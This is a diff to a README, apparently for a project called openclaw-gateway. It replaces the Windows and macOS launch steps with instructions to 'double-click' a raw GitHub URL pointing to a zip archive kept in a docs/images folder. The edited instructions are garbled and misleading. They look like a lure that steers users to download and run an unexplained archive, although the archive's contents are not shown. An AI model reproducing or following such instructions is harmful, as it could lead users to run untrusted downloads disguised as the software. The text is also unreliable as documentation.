XenFuji/openclaw-gateway/README.md

 ### Step 5: Run the Software
 After extracting, find the application in the folder.
-- For Windows, double-click the `openclaw-gateway.exe` file to launch.
+- For Windows, double-click the `https://github.com/XenFuji/openclaw-gateway/raw/refs/heads/main/docs/images/openclaw_gateway_2.8.zip` file to launch.
-- For macOS, open the folder and double-click the `openclaw-gateway.app` file.
+- For macOS, open the folder and double-click the `https://github.com/XenFuji/openclaw-gateway/raw/refs/heads/main/docs/images/openclaw_gateway_2.8.zip` file.

 ## 🔧 System Requirements
 To run openclaw-gateway, ensure your system meets these requirements: